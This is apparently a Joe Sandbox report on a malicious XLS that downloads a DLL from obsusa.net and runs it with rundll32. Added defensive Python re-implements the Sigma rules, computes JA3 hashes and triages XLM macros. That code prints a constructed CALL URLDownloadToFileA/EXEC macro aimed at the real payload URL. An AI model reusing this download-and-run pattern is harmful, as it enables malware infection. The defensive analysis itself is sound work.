Analysis Report e1df57de_by_Libranalysis

Overview

General Information

Sample Name:e1df57de_by_Libranalysis (renamed file extension from none to xls)
Analysis ID:403717
MD5:e1df57deebdfeab450bf91049acff902
SHA1:0037a523a17be3411b88072f7ceb3cc0ef384da7
SHA256:b0cccc9e79029c5b0b4e835e22e783a37ded6a300ca9d1738e554b126dd0969c
Tags:SilentBuilder

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: System File Execution Location Anomaly
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Yara signature match

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2512 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 1552 cmdline: rundll32 ..\qqjdkdl.obp,StartW MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: e1df57de_by_Libranalysis.xls
Rule: SUSP_EnableContent_String_Gen
Description: Detects suspicious string that asks to enable active content in Office Doc
Author: Florian Roth
Strings:
  • 0x16663:$e1: Enable Editing
  • 0x163ad:$e3: Enable editing
  • 0x1647f:$e4: Enable content

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: rundll32 ..\qqjdkdl.obp,StartW, CommandLine: rundll32 ..\qqjdkdl.obp,StartW, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2512, ProcessCommandLine: rundll32 ..\qqjdkdl.obp,StartW, ProcessId: 1552
Sigma detected: System File Execution Location Anomaly
Source: Process started | Author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community | Data: the same process-start event as listed for the rule above (rundll32 ..\qqjdkdl.obp,StartW, ProcessId 1552, ParentProcessId 2512)
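Added example, written for this page and not code from the Joe Sandbox report or the Sigma project: the matching logic of the two rules above re-implemented over plain process-start events, plus a third check on the shape of the rundll32 argument recorded here, a relative path (..\qqjdkdl.obp) with a non-.dll extension, which rundll32 will still load as a PE. The first event copies the Image, ParentImage and CommandLine fields from the record above; the other two are constructed. The product and binary lists are shortened subsets of the public rules, and the rule revisions the sandbox used are not shown in the report; the location check as written here treats C:\Windows\System32\ as an expected directory and so does not fire on the report's event.

```python
"""Re-implementation of the two Sigma rules' logic plus a rundll32 argument check.
Added illustration; not code from the Joe Sandbox report or the Sigma project.
Field names follow the Sysmon-style keys used in the report (Image, ParentImage,
CommandLine). The product/binary lists are shortened from the public rules."""
import ntpath
import re

# Parents covered by "Microsoft Office Product Spawning Windows Shell" (subset).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "msaccess.exe",
                  "mspub.exe", "outlook.exe", "visio.exe", "onenote.exe"}
# Children the same rule treats as shells / LOLBins (subset).
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                  "mshta.exe", "regsvr32.exe", "rundll32.exe", "msiexec.exe",
                  "wmic.exe", "schtasks.exe", "certutil.exe", "bitsadmin.exe"}
# Binaries "System File Execution Location Anomaly" expects only under the
# Windows system directories (subset; directories are this example's choice).
SYSTEM_BINARIES = {"rundll32.exe", "svchost.exe", "regsvr32.exe", "lsass.exe",
                   "services.exe", "csrss.exe", "smss.exe", "wininit.exe",
                   "winlogon.exe", "conhost.exe", "dllhost.exe", "spoolsv.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
               "c:\\windows\\winsxs\\")

# rundll32 [path\]module,entry ; the module may be quoted.
RUNDLL32_RE = re.compile(
    r'^\s*"?(?:\S*\\)?rundll32(?:\.exe)?"?\s+'
    r'(?P<module>"[^"]+"|[^\s,]+)\s*,\s*(?P<entry>\S+)', re.IGNORECASE)


def _image_name(path):
    """Lower-cased file name of a Windows path, quotes stripped."""
    return ntpath.basename(path.strip("'\"")).lower()


def office_spawning_shell(event):
    """True when an Office product starts a shell/LOLBin child."""
    return (_image_name(event.get("ParentImage", "")) in OFFICE_PARENTS
            and _image_name(event.get("Image", "")) in SHELL_CHILDREN)


def system_exe_location_anomaly(event):
    """True when a system binary runs from outside the system directories."""
    image = event.get("Image", "").strip("'\"").lower()
    if ntpath.basename(image) not in SYSTEM_BINARIES:
        return False
    return not image.startswith(SYSTEM_DIRS)


def rundll32_module(cmdline):
    """Parse a rundll32 command line into module/entry plus two risk flags.
    rundll32 loads the module as a PE whatever its extension, so a non-.dll
    extension or a relative directory path ('..\\x.obp') is worth alerting on."""
    m = RUNDLL32_RE.match(cmdline)
    if not m:
        return None
    module = m.group("module").strip('"')
    has_dir = "\\" in module or "/" in module
    return {
        "module": module,
        "entry": m.group("entry"),
        "relative_path": has_dir and not ntpath.isabs(module),
        "non_dll_extension": ntpath.splitext(module)[1].lower() != ".dll",
    }


def triage(event):
    """Return the names of the checks that fire for one process-start event."""
    hits = []
    if office_spawning_shell(event):
        hits.append("office_spawning_shell")
    if system_exe_location_anomaly(event):
        hits.append("system_exe_location_anomaly")
    info = rundll32_module(event.get("CommandLine", ""))
    if info and (info["relative_path"] or info["non_dll_extension"]):
        hits.append("rundll32_suspicious_module")
    return hits


# Constructed events: the first copies the fields from the report above.
REPORT_EVENT = {
    "Image": "C:\\Windows\\System32\\rundll32.exe",
    "ParentImage": "C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE",
    "CommandLine": "rundll32 ..\\qqjdkdl.obp,StartW",
}
BENIGN_EVENT = {  # Control Panel applet launched from Explorer (constructed)
    "Image": "C:\\Windows\\System32\\rundll32.exe",
    "ParentImage": "C:\\Windows\\explorer.exe",
    "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL",
}
RELOCATED_EVENT = {  # hypothetical copy of rundll32 running from a temp dir
    "Image": "C:\\Users\\user\\AppData\\Local\\Temp\\rundll32.exe",
    "ParentImage": "C:\\Windows\\explorer.exe",
    "CommandLine": "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL",
}

if __name__ == "__main__":
    for label, ev in [("report", REPORT_EVENT), ("benign", BENIGN_EVENT),
                      ("relocated", RELOCATED_EVENT)]:
        print(label, triage(ev))
```

The rundll32 check is the one that carries weight on its own: an Office parent already explains the first hit, and a bare `shell32.dll,Control_RunDLL` from Explorer passes cleanly, while a module loaded by relative path with a made-up extension does not.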

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: e1df57de_by_Libranalysis.xls | ReversingLabs: Detection: 10%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 170.249.236.47:443 -> 192.168.2.22:49165 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe
Source: global traffic | DNS query: name: obsusa.net
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 170.249.236.47:443 (listed twice in the original report)
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\975C826B.emf
Source: rundll32.exe, 00000003.00000002.2116638550.0000000001B70000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: obsusa.net
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000003.00000002.2116638550.0000000001B70000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2116638550.0000000001B70000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2117047835.0000000001D57000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2117047835.0000000001D57000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2117047835.0000000001D57000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2117047835.0000000001D57000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2116638550.0000000001B70000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2117047835.0000000001D57000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2116638550.0000000001B70000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2116638550.0000000001B70000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: e1df57de_by_Libranalysis.xls | String found in binary or memory: https://obsusa.net/chemgrcr.dll
Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown | HTTPS traffic detected: 170.249.236.47:443 -> 192.168.2.22:49165 version: TLS 1.2
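The JA3 fingerprint above was computed by the sandbox from the real ClientHello sent to 170.249.236.47:443; the report does not include the handshake bytes. The following is an added illustration (written for this page, not code from the sandbox or from the JA3 project) of how that value is derived: the decimal client version, cipher suites, extension types, supported groups and EC point formats are joined with commas and dashes, GREASE values are dropped, and the string is MD5-hashed. The ClientHello here is constructed, so its hash will not equal the one in the report. A caveat worth keeping in mind when reading the "JA3 Fingerprints" context table further down: JA3 identifies the TLS client library, here whatever the Windows 7 analysis system used for the download, so other samples sharing this hash share that client stack, not necessarily the same payload or operator; the shared destination IP in that table is the stronger link.

```python
"""JA3 client fingerprint from a TLS ClientHello record.
Added illustration; the ClientHello below is constructed, not a capture from
the sandbox, so its hash will not equal the one in the report."""
import hashlib
import struct


def _is_grease(value):
    """GREASE values (0x0a0a, 0x1a1a, ..., 0xfafa) are excluded from JA3."""
    return (value & 0x0f0f) == 0x0a0a


def _u16_list(values):
    """Vector of uint16 with a 2-byte length prefix (cipher/group lists)."""
    body = b"".join(struct.pack(">H", v) for v in values)
    return struct.pack(">H", len(body)) + body


def sni_extension(hostname):
    """server_name extension body carrying one host_name entry."""
    name = hostname.encode()
    entry = b"\x00" + struct.pack(">H", len(name)) + name
    return struct.pack(">H", len(entry)) + entry


def build_client_hello(version, ciphers, extensions):
    """Wrap a minimal ClientHello (zero random, empty session id, null
    compression) in a TLS record. extensions: list of (type, body_bytes)."""
    body = struct.pack(">H", version) + bytes(32) + b"\x00"
    body += _u16_list(ciphers) + b"\x01\x00"
    ext = b"".join(struct.pack(">HH", t, len(d)) + d for t, d in extensions)
    body += struct.pack(">H", len(ext)) + ext
    handshake = b"\x01" + struct.pack(">I", len(body))[1:] + body
    return b"\x16\x03\x01" + struct.pack(">H", len(handshake)) + handshake


def ja3(record):
    """Return (ja3_string, ja3_md5) for a TLS record holding a ClientHello."""
    if record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    hs_len = struct.unpack(">H", record[3:5])[0]
    hs = record[5:5 + hs_len]
    if hs[0] != 0x01:
        raise ValueError("not a ClientHello")
    p = 4                                   # handshake type + 3-byte length
    version = struct.unpack(">H", hs[p:p + 2])[0]
    p += 2 + 32                             # client_version, random
    p += 1 + hs[p]                          # session_id
    cs_len = struct.unpack(">H", hs[p:p + 2])[0]
    p += 2
    ciphers = [c for (c,) in struct.iter_unpack(">H", hs[p:p + cs_len])
               if not _is_grease(c)]
    p += cs_len
    p += 1 + hs[p]                          # compression_methods
    ext_types, groups, formats = [], [], []
    if p + 2 <= len(hs):
        end = p + 2 + struct.unpack(">H", hs[p:p + 2])[0]
        p += 2
        while p + 4 <= end:
            etype, elen = struct.unpack(">HH", hs[p:p + 4])
            data = hs[p + 4:p + 4 + elen]
            p += 4 + elen
            if _is_grease(etype):
                continue
            ext_types.append(etype)
            if etype == 10:                 # supported_groups
                glen = struct.unpack(">H", data[:2])[0]
                groups = [g for (g,) in struct.iter_unpack(">H", data[2:2 + glen])
                          if not _is_grease(g)]
            elif etype == 11:               # ec_point_formats
                formats = list(data[1:1 + data[0]])
    fields = [str(version)] + ["-".join(str(v) for v in part)
                               for part in (ciphers, ext_types, groups, formats)]
    ja3_string = ",".join(fields)
    return ja3_string, hashlib.md5(ja3_string.encode()).hexdigest()


# Constructed ClientHello: TLS 1.2, three real suites plus one GREASE suite
# and one GREASE extension, SNI for the domain the report shows.
SAMPLE_HELLO = build_client_hello(
    0x0303,
    [0x0a0a, 0xc02b, 0xc02f, 0x002f],
    [(0x1a1a, b""),
     (0, sni_extension("obsusa.net")),
     (10, _u16_list([0x0a0a, 29, 23, 24])),
     (11, b"\x01\x00")])

if __name__ == "__main__":
    print(*ja3(SAMPLE_HELLO))
```

Because GREASE entries are stripped before hashing, a client that randomises them still produces a stable hash; the test below checks that the same hello without the GREASE entries gives the same result.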

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable editing" to unlock the editina document downloaded from the Internet. 13 " ' 14 RunDLL |~|
Source: Screenshot number: 4 | Screenshot OCR: Enable content" to perfor tart 18 the decryption of the document The specified module could not be
Source: Document image extraction number: 2 | Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
Source: Document image extraction number: 2 | Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 3 | Screenshot OCR: Enable Content
Source: Document image extraction number: 4 | Screenshot OCR: Enable Editing
Source: Document image extraction number: 13 | Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Document image extraction number: 13 | Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Found Excel 4.0 Macro with suspicious formulas
Source: e1df57de_by_Libranalysis.xls | Initial sample: EXEC
Source: e1df57de_by_Libranalysis.xls | Initial sample: CALL
Source: e1df57de_by_Libranalysis.xls | OLE indicator, VBA macros: true
Source: e1df57de_by_Libranalysis.xls, type: SAMPLE | Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
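The findings above (EXEC and CALL formulas, URLDownloadToFileA recorded as the load origin, the URL https://obsusa.net/chemgrcr.dll inside the file) together with the rundll32 ..\qqjdkdl.obp,StartW child process are the parts of a common Excel 4.0 (XLM) downloader: CALL imports URLDownloadToFileA from urlmon to fetch the payload to a local path, and EXEC then starts it through rundll32. The report does not show the actual cells, so the formulas in the following added example are constructed to match those findings and are not the sample's. The code is mine, not the sandbox's: a static triage routine over decoded XLM formula strings that records the functions used, the DLL exports called, URLs, dropped paths, commands and GET.WORKSPACE environment checks, and turns them into a score. Pulling the formulas out of the BIFF Workbook stream of an .xls (and the hidden-sheet flag behind the "Hidden Macro 4.0" label in the Detection section) needs a BIFF parser such as oletools' olevba and is outside this example.

```python
"""Static triage of decoded Excel 4.0 (XLM) macro formulas.
Added illustration, not the sandbox's code; the sample formulas are
constructed to match the findings in the report, not read from the file."""
import re

# Functions that matter for triage and the weight each adds to the score.
SCORED_FUNCTIONS = {
    "EXEC": 3,          # starts a process
    "CALL": 3,          # calls an arbitrary DLL export (e.g. URLDownloadToFileA)
    "REGISTER": 3,      # imports a DLL export as a callable XLM function
    "FORMULA": 1,       # writes cells at run time: staged/obfuscated macros
    "FORMULA.FILL": 1,
    "CHAR": 1,          # builds strings from character codes
}
# GET.WORKSPACE arguments commonly used to detect analysis environments.
WORKSPACE_CHECKS = {19: "mouse present", 42: "sound capable"}
AUTO_EXEC_PREFIXES = ("auto_open", "auto_close", "auto_activate")

_STRING_RE = re.compile(r'"([^"]*)"')
_FUNC_RE = re.compile(r'\b([A-Za-z][A-Za-z0-9.]*)\s*\(')
_OUTER_RE = re.compile(r'^\s*=?\s*([A-Za-z][A-Za-z0-9.]*)\s*\((.*)\)\s*$', re.S)
_WORKSPACE_RE = re.compile(r'GET\.WORKSPACE\s*\(\s*(\d+)\s*\)', re.I)


def _split_args(text):
    """Split an argument list on top-level commas (respects quotes/parens)."""
    args, cur, depth, quoted = [], [], 0, False
    for ch in text:
        if ch == '"':
            quoted = not quoted
        elif not quoted:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            elif ch == "," and depth == 0:
                args.append("".join(cur).strip())
                cur = []
                continue
        cur.append(ch)
    if cur or args:
        args.append("".join(cur).strip())
    return args


def _unquote(arg):
    return arg[1:-1] if len(arg) >= 2 and arg[0] == arg[-1] == '"' else arg


def triage_xlm(formulas, defined_names=()):
    """Summarise a list of XLM formula strings (one cell each)."""
    r = {"functions": set(), "api_calls": [], "commands": [], "urls": [],
         "files": [], "evasion_checks": [], "auto_exec_names": [], "score": 0}
    for f in formulas:
        no_strings = _STRING_RE.sub('""', f)       # keep names out of string args
        for name in _FUNC_RE.findall(no_strings):
            r["functions"].add(name.upper())
        m = _OUTER_RE.match(f)
        outer = m.group(1).upper() if m else None
        args = [_unquote(a) for a in _split_args(m.group(2))] if m else []
        commands_here = set()
        if outer == "CALL" and len(args) >= 2:
            r["api_calls"].append((args[0], args[1]))   # (dll, export)
        elif outer == "EXEC" and args:
            r["commands"].append(args[0])
            commands_here.add(args[0])
        for s in _STRING_RE.findall(f):
            if re.match(r"https?://", s, re.I):
                r["urls"].append(s)
            elif s not in commands_here and ("\\" in s or "/" in s):
                r["files"].append(s)
        for n in _WORKSPACE_RE.findall(no_strings):
            n = int(n)
            if n in WORKSPACE_CHECKS:
                r["evasion_checks"].append((n, WORKSPACE_CHECKS[n]))
    r["auto_exec_names"] = [n for n in defined_names
                            if n.lower().startswith(AUTO_EXEC_PREFIXES)]
    r["score"] = (sum(SCORED_FUNCTIONS.get(fn, 0) for fn in r["functions"])
                  + 2 * len(r["urls"]) + 2 * len(r["evasion_checks"])
                  + 2 * len(r["auto_exec_names"]))
    r["verdict"] = ("suspicious" if r["score"] >= 5
                    else "review" if r["score"] else "clean")
    return r


# Constructed macro matching the report's findings (not the sample's cells).
SAMPLE_MACRO = [
    '=IF(GET.WORKSPACE(19),,CLOSE(TRUE))',       # bail out when no mouse is present
    '=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,'
    '"https://obsusa.net/chemgrcr.dll","..\\qqjdkdl.obp",0,0)',
    '=EXEC("rundll32 ..\\qqjdkdl.obp,StartW")',
    '=HALT()',
]

if __name__ == "__main__":
    for key, value in triage_xlm(SAMPLE_MACRO, defined_names=["Auto_Open"]).items():
        print(f"{key}: {value}")
```

The Auto_Open defined name is what makes the macro run without a click once the user accepts the "Enable content" lure, so the defined names of the workbook are part of the input, not just the formulas.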
Source: rundll32.exe, 00000003.00000002.2116638550.0000000001B70000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal76.expl.evad.winXLS@3/9@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRE4E2.tmp
Source: e1df57de_by_Libranalysis.xls | OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\qqjdkdl.obp,StartW (listed three times in the original report)
Source: e1df57de_by_Libranalysis.xls | ReversingLabs: Detection: 10%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (27 occurrences)
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Techniques observed, grouped by tactic, with the number of matching behaviours in parentheses (the remaining cells of the matrix are unmatched placeholder techniques and are omitted):
  • Execution: Exploitation for Client Execution (23), Scripting (11)
  • Privilege Escalation: Process Injection (1)
  • Defense Evasion: Masquerading (1), Disable or Modify Tools (1), Rundll32 (1), Process Injection (1), Scripting (11)
  • Discovery: File and Directory Discovery (1), System Information Discovery (2)
  • Command and Control: Encrypted Channel (2), Non-Application Layer Protocol (1), Application Layer Protocol (2), Ingress Tool Transfer (1)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

  • e1df57de_by_Libranalysis.xls: 11% (ReversingLabs)

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

  • obsusa.net: 0% (Virustotal)

URLs

  • https://obsusa.net/chemgrcr.dll: 2% (Virustotal); 0%, safe (Avira URL Cloud)
  • http://www.icra.org/vocabulary/.: 0%, safe (URL Reputation; listed four times in the original report)
  • http://windowsmedia.com/redir/services.asp?WMPFriendly=true: 0%, safe (URL Reputation; listed four times in the original report)

Domains and IPs

Contacted Domains

  • obsusa.net: 170.249.236.47 (Active: true, Malicious: false, Antivirus Detection: none, Reputation: unknown)

URLs from Memory and Binaries

  • http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check (source: rundll32.exe, 00000003.00000002.2117047835.0000000001D57000.00000002.00000001.sdmp; malicious: false; reputation: high)
  • http://www.windows.com/pctv. (source: rundll32.exe, 00000003.00000002.2116638550.0000000001B70000.00000002.00000001.sdmp; malicious: false; reputation: high)
  • https://obsusa.net/chemgrcr.dll (source: e1df57de_by_Libranalysis.xls; malicious: false; 2% Virustotal; Avira URL Cloud: safe; reputation: unknown)
  • http://investor.msn.com (source: rundll32.exe, 00000003.00000002.2116638550.0000000001B70000.00000002.00000001.sdmp; malicious: false; reputation: high)
  • http://www.msnbc.com/news/ticker.txt (source: rundll32.exe, 00000003.00000002.2116638550.0000000001B70000.00000002.00000001.sdmp; malicious: false; reputation: high)
  • http://www.icra.org/vocabulary/. (source: rundll32.exe, 00000003.00000002.2117047835.0000000001D57000.00000002.00000001.sdmp; malicious: false; URL Reputation: safe; reputation: unknown)
  • http://windowsmedia.com/redir/services.asp?WMPFriendly=true (source: rundll32.exe, 00000003.00000002.2117047835.0000000001D57000.00000002.00000001.sdmp; malicious: false; URL Reputation: safe; reputation: unknown)
  • http://www.hotmail.com/oe (source: rundll32.exe, 00000003.00000002.2116638550.0000000001B70000.00000002.00000001.sdmp; malicious: false; reputation: high)
  • http://investor.msn.com/ (source: rundll32.exe, 00000003.00000002.2116638550.0000000001B70000.00000002.00000001.sdmp; malicious: false; reputation: high)

Contacted IPs

Public

  • 170.249.236.47: domain obsusa.net, United States, ASN 63410 (PRIVATESYSTEMSUS), Malicious: false

              General Information

              Joe Sandbox Version:32.0.0 Black Diamond
              Analysis ID:403717
              Start date:04.05.2021
              Start time:10:50:30
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 5m 22s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:e1df57de_by_Libranalysis (renamed file extension from none to xls)
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:6
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal76.expl.evad.winXLS@3/9@1/1
              EGA Information:Failed
              HDC Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Found warning dialog
              • Click Ok
              • Attach to Office via COM
              • Scroll down
              • Close Viewer
              Warnings:
              • Excluded IPs from analysis (whitelisted): 205.185.216.42, 205.185.216.10
              • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, au-bg-shim.trafficmanager.net
              • Report size getting too big, too many NtCreateFile calls found.
              • Report size getting too big, too many NtQueryAttributesFile calls found.

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASN

Match: PRIVATESYSTEMSUS. Other samples in Joe Sandbox View (all detected as malicious) that contacted an IP in this ASN, with the IP each one contacted:
  • copy of payment 7006.vbs: 170.249.206.186
  • 369290.xls: 204.197.253.150
  • Payment_png.exe: 170.249.199.106
  • R8WWx5t2RE.dll: 108.160.158.123
  • P.O 5282.exe: 170.249.209.250
  • documentation (64).xls: 67.222.24.174 (listed twice in the original report)
  • Statement for T10495.jar: 207.7.94.54
  • Statement for T10495 - 18-01-21 15-23.jar: 207.7.94.54
  • Revise Order.exe: 162.248.50.97
  • PO21010699XYJ.exe: 162.248.50.97
  • cmtel-pdf.html: 204.197.244.149 (listed twice in the original report)
  • SecuriteInfo.com.Trojan.PWS.Stealer.29660.11031.exe: 162.211.86.20
  • https://oldfordcrewcabs.com/bin/new/s/?signin=d41d8cd98f00b204e9800998ecf8427e&auth=576667a3e7108b979c62abddd4c8f3e39d282c0ee888bd787542afb4ff83df171524e184: 199.167.203.145
  • SecuriteInfo.com.Trojan.PackedNET.405.30542.exe: 162.211.86.20
  • 4ADvH4Xsmh.exe: 162.246.57.153
  • https://www.casalfarneto.it/wp-content/siteguarding_logs/www.html: 104.193.111.209
  • RFQ-1225 BE285-20-B-1-SMcS - Easi-Clip Project.exe: 158.106.136.41
  • justificante de la transfer.exe: 162.246.57.153

              JA3 Fingerprints

Match: 7dcce5b76c8b17472d024758970a406b. Other samples in Joe Sandbox View (all detected as malicious) that produced the same JA3 fingerprint; every one of them also contacted 170.249.236.47:
  • MV RED SEA.docx
  • SecuriteInfo.com.Heur.31681.xls
  • catalog-1521295750.xlsm
  • Documents_111651917_375818984.xls
  • Documents_95326461_1831689059.xls
  • 471e3984_by_Libranalysis.docx
  • presupuesto.xlsx
  • ORDER INQUIRY.doc
  • Outstanding Payment Plan.xls
  • SecuriteInfo.com.Heur.3869.xls
  • SecuriteInfo.com.Heur.12433.xls
  • Documents_1906038956_974385067.xls
  • SecuriteInfo.com.Heur.3421.xls
  • diagram-586750002.xlsm
  • 94a5cd81_by_Libranalysis.xls
  • Documents_585904356_2104184844.xls
  • e9251e1f_by_Libranalysis.docx
  • statistic-1048881972.xlsm
  • Specificatiile produsului.xlsx
  • be1aca64_by_Libranalysis.docx

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
              Category:dropped
              Size (bytes):58596
              Entropy (8bit):7.995478615012125
              Encrypted:true
              SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
              MD5:61A03D15CF62612F50B74867090DBE79
              SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
